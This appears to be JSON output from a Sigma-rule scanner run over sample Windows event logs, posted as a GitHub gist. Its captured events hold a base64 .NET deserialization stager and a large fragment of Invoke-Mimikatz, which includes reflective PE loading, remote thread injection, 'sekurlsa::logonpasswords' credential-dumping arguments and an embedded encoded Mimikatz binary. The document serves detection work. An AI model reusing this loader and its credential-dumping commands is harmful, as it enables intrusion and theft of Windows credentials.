9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGcgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBnMAAAALZ2V0X0N1cnJlbnQKAUsAAABDAAAACXMAAAAJPgAAAAlyAAAABnYAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQZ3AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkIAAAACgFMAAAAQgAAAAZ4AAAAxgFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZ6AAAAEFN5c3RlbS5BY3RpdmF0b3IGewAAAA5DcmVhdGVJbnN0YW5jZQoBTQAAAEMAAAAJewAAAAk+AAAACXoAAAAGfgAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQZ/AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpCAAAAAoBTgAAAA8AAAAGgAAAACZTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkNvbW1hbmRJRAQAAAAJOgAAABBPAAAAAgAAAAmCAAAACAgAIAAABIIAAAALU3lzdGVtLkd1aWQLAAAAAl9hAl9iAl9jAl9kAl9lAl9mAl9nAl9oAl9pAl9qAl9rAAAAAAAAAAAAAAAIBwcCAgICAgICAhMT0nTuKtERi/sAoMkPJvcLCw==\\\"\r\\n\r\\nDim fmt_1\r\\nSet fmt_1 = CreateObject(\\\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\\\")\r\\nfmt_1.Deserialize_2(Base64ToStream(stage_1, 2341))\r\\n\r\\nIf Err.Number <> 0 Then\r\\n  Dim fmt_2\r\\n  Set fmt_2 = CreateObject(\\\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\\\")\r\\n  fmt_2.Deserialize_2(Base64ToStream(stage_2, 20104))\r\\nEnd If\r\\n\r\\n\r\\n\"  Provider_Name: Microsoft-Windows-Sysmon  Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9  EventID: 20  Version: 3  Level: 4  Task: 20  Opcode: 0  Keywords: 9223372036854775808  TimeCreated_SystemTime: 1.630497103601843e+09  EventRecordID: 1816  Execution_ProcessID: 5528  Execution_ThreadID: 3328  Channel: Microsoft-Windows-Sysmon/Operational  Computer: dc01.isengard.local  Security_UserID: S-1-5-18  EventID: 20  ",
  "File": "evtx/sysmon-blacksmith.evtx",
  "Channel": "Microsoft-Windows-Sysmon/Operational"
}
{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/builtin/win_alert_mimikatz_keywords.yml",
  "RuleTitle": "Mimikatz Use",
  "RuleId": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "keywords",
      "Field": "raw",
      "Offset": 8144,
      "Data": "sekurlsa::"
    }
  ],
  "Event": "MessageNumber: \u000b  MessageTotal: �  ScriptBlockText: nyways\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)\n\t\t\t\tif ($Success -eq $false)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Unable to free library: $ImportDllPath. Continuing anyways.\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Call DllMain with process detach\n\t\tWrite-Verbose \"Calling dllmain so the DLL knows it is being unloaded\"\n\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\n\t\t$DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null\n\t\t\n\t\t\n\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t}\n\t}\n\n\n\tFunction Main\n\t{\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants =  Get-Win32Constants\n\t\t\n\t\t$RemoteProcHandle = [IntPtr]::Zero\n\t\n\t\t#If a remote process to inject in to is specified, get a handle to it\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne \"\"))\n\t\t{\n\t\t\tThrow \"Can't supply a ProcId and ProcName, choose one or the other\"\n\t\t}\n\t\telseif ($ProcName -ne $null -and $ProcName -ne \"\")\n\t\t{\n\t\t\t$Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)\n\t\t\tif ($Processes.Count -eq 0)\n\t\t\t{\n\t\t\t\tThrow \"Can't find process $ProcName\"\n\t\t\t}\n\t\t\telseif ($Processes.Count -gt 1)\n\t\t\t{\n\t\t\t\t$ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId\n\t\t\t\tWrite-Output $ProcInfo\n\t\t\t\tThrow \"More than one instance of $ProcName found, please specify the process ID to inject in to.\"\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$ProcId = $Processes[0].ID\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.\n\t\t#If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege\n#\t\tif ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)\n#\t\t{\n#\t\t\tWrite-Verbose \"Getting SeDebugPrivilege\"\n#\t\t\tEnable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n#\t\t}\t\n\t\t\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0))\n\t\t{\n\t\t\t$RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)\n\t\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't obtain the handle for process ID: $ProcId\"\n\t\t\t}\n\t\t\t\n\t\t\tWrite-Verbose \"Got the handle for the remote process to inject in to\"\n\t\t}\n\t\t\n\n\t\t#Load the PE reflectively\n\t\tWrite-Verbose \"Calling Invoke-MemoryLoadLibrary\"\n\n        try\n        {\n            $Processors = Get-WmiObject -Class Win32_Processor\n        }\n        catch\n        {\n            throw ($_.Exception)\n        }\n\n        if ($Processors -is [array])\n        {\n            $Processor = $Processors[0]\n        } else {\n            $Processor = $Processors\n        }\n\n        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8) )\n        {\n            Write-Verbose ( \"Architecture: \" + $Processor.AddressWidth + \" Process: \" + ([System.IntPtr]::Size * 8))\n            Write-Error \"PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS.\" -ErrorAction Stop\n        }\n\n        #Determine whether or not to use 32bit or 64bit bytes\n        if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64)\n        }\n        else\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)\n        }\n        $PEBytes[0] = 0\n        $PEBytes[1] = 0\n\t\t$PEHandle = [IntPtr]::Zero\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\tif ($PELoadedInfo -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to load PE, handle returned is NULL\"\n\t\t}\n\t\t\n\t\t$PEHandle = $PELoadedInfo[0]\n\t\t$RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process\n\t\t\n\t\t\n\t\t#Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\tif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))\n\t\t{\n\t\t\t#########################################\n\t\t\t### YOUR CODE GOES HERE\n\t\t\t#########################################\n                    Write-Verbose \"Calling function with WString return type\"\n\t\t\t\t    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"powershell_reflective_mimikatz\"\n\t\t\t\t    if ($WStringFuncAddr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Couldn't find function address.\"\n\t\t\t\t    }\n\t\t\t\t    $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])\n\t\t\t\t    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)\n                    $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs)\n\t\t\t\t    [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput)\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput)\n\t\t\t\t    if ($OutputPtr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t    \tThrow \"Unable to get output, Output Ptr is NULL\"\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t        $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)\n\t\t\t\t        Write-Output $Output\n\t\t\t\t        $Win32Functions.LocalFree.Invoke($OutputPtr);\n\t\t\t\t    }\n\t\t\t#########################################\n\t\t\t### END OF YOUR CODE\n\t\t\t#########################################\n\t\t}\n\t\t#For remote DLL injection, call a void function which takes no parameters\n\t\telseif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n\t\t\tif (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))\n\t\t\t{\n\t\t\t\tThrow \"VoidFunc couldn't be found in the DLL\"\n\t\t\t}\n\t\t\t\n\t\t\t$VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle\n\t\t\t$VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle\n\t\t\t\n\t\t\t#Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions\n\t\t}\n\t\t\n\t\t#Don't free a library if it is injected in a remote process\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tInvoke-MemoryFreeLibrary -PEHandle $PEHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\t#Just delete the memory allocated in PowerShell to build the PE before injecting to remote process\n\t\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t\t}\n\t\t}\n\t\t\n\t\tWrite-Verbose \"Done!\"\n\t}\n\n\tMain\n}\n\n#Main function to either run the script locally or remotely\nFunction Main\n{\n\tif (($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\n\t{\n\t\t$DebugPreference  = \"Continue\"\n\t}\n\t\n\tWrite-Verbose \"PowerShell ProcessID: $PID\"\n\t\n\n\tif ($PsCmdlet.ParameterSetName -ieq \"DumpCreds\")\n\t{\n\t\t$ExeArgs = \"sekurlsa::logonpasswords exit\"\n\t}\n    elseif ($PsCmdlet.ParameterSetName -ieq \"DumpCerts\")\n    {\n        $ExeArgs = \"crypto::cng crypto::capi `\"crypto::certificates /export`\" `\"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`\" exit\"\n    }\n    else\n    {\n        $ExeArgs = $Command\n    }\n\n    [System.IO.Directory]::SetCurrentDirectory($pwd)\n\n    # 2.1 (x64) 20161029 OJ Edition!\n    # SHA256 hash: C36572664731F058A282FA6F943E48FE80646F6613C3A46F3EEE1F4A121B2158\n    # VirusTotal Analysis: https://www.virustotal.com/en/file/c36572664731f058a282fa6f943e48fe80646f6613c3a46f3eee1f4a121b2158/analysis/1478821040/\n    $PEBytes64 = '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  ScriptBlockId: 334734fa-3743-480e-8341-8c3c57da0950  Path: C:\\Users\\neo\\Downloads\\Invoke-Mimikatz.ps1  Provider_Name: Microsoft-Windows-PowerShell  Provider_Guid: A0C1853B-5C40-4B15-8766-3CF1C58F985A  EventID: 4104  Version: 1  Level: 3  Task: 2  Opcode: 15  Keywords: 0  TimeCreated_SystemTime: 1.5746709037001536e+09  EventRecordID: 650  Correlation_ActivityID: 7CA979B2-A06E-0000-9C73-AA7C6EA0D501  Execution_ProcessID: 8212  Execution_ThreadID: 1824  Channel: Microsoft-Windows-PowerShell/Operational  Computer: HYPERION  Security_UserID: S-1-5-21-1569579455-888006095-2183311757-1001  EventID: 4104  ",
  "File": "evtx/Win10-PowerShell.evtx",
  "Channel": "Microsoft-Windows-PowerShell/Operational"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment